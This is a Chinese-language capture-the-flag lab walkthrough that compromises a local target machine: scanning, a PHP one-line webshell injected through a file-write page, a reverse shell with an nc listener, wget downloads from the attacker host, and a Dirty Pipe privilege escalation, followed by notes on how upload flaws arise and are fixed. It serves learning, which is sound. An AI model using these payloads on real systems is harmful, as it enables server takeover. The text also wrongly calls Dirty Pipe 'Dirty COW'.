1.确定目标

使用nmap -sP对靶机进行扫描

确定位置之后进行深度扫描

对网段进行深度扫描nmap -p- -sS -sV -A

-p- 扫描开放的端口号

-sS 半开连接，不进行三次握手，安全性高，使用频率高

-sV 对端口上的服务程序版本进行扫描

-A 强力扫描，耗时长、

nmap扫描结果 ，靶机开放22（ssh）端口 80（hettp）端口

2.信息搜集

没有账号密码无法对22端口进行爆破

对80端口进行http扫描

使用gobuster工具对目录进行扫描

gobuster dir -u http://192.168.80.139 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,html,txt

-u 确定网址

-w 使用字典目录

-x 筛选特定后缀页面

访问80端口页面没有什么有用信息

然后访问目录扫描出来的页面http://192.168.80.139/graffiti.php

在尝试过程中发现页面会将输入框中输入的内容打印在页面上面

页面功能是上传，可能存在上传漏洞

设置代理，用burp进行抓包查看

抓包结果：页面会将输入框内容输入到graffiti.txt中

1.一句话木马

可以用一句话木马到可执行页面中获得反弹shell

message=<?php+eval($_POST['cmd']);?>&file=test.php

使用蚁剑进行连接

打开shell

打开kali机的http.server服务

使用wget命令下载反弹shell可执文件

2.直接在burp中发送反弹shell代码生成文件

两种方法都可以把反弹shell可执行文件加入http目录

3.分析

反弹shell可执行代码

cp /usr/share/webshells/php/php-reverse-shell.php .

把ip地址设置到kali上面，监听端口也可以设置

文件显示，访问可以运行这个文件代码的页面就可以获得shell

4.发现漏洞

在kali上面设置监听

nc -vlp 1234

浏览器访问我们上传文件所在的页面http://192.168.80.139/4399.php

python3 -c 'import pty; pty.spawn("/bin/bash")'

获取交互shell

kali上开启http服务

靶机上面下载漏洞探测脚本

chmod +x linpeas.sh   让文件具有可执行权限
./linpeas.sh          执行文件进行漏洞探测

这里使用CVE-2022-0847

到GitHub上面下载源码

https://github.com/r1is/CVE-2022-0847/blob/main/Dirty-Pipe.sh

5.内核提权（脏牛）

kali打开http服务

靶机下载漏洞文件

chmod +x Dirty-Pipe.sh
./Dirty-Pipe.sh

提权成功

总结：

今天学习到的第一个漏洞:文件上传漏洞:三步走(1.原理 2.如何挖掘 3.如何修复)

原理(什么是文件上传):顾名思义，就是上传了一个文件，比如qq或者学校官网办事大厅修改自己的头像是不是需要上传一个jpg,或者png的照片文件上去， 当然在理想状态下也只会上传jpg或者png的文件，但是如果我们上传一个php文件，并且里面写入一句话木马，然后访问进行解析到，那后果是什么?所以原理就来啦:文件上传漏洞是指攻击者上传了一个可执行的脚本文件，并通过此脚本文件获得了执行服务端命令的能力。 如何挖掘:寻找下手点，常见的涉及到关联文件的地方，例如头像，个人资料设置，编辑器模板等等。 如何修复:白名单限制...

4.权限提升 4.1:常见的Linux提权方式:1.内核漏洞提权 2.利用SUID提权 3.SUDO提权 4.NFS提权 5.MySQL提权 本靶场用到的提权方式为:内核提权(exp) 上传linpeas脚本进行枚举:(发现系统详细信息，包括可用的exp，但是可能会有误报，不是扫出来就能用的)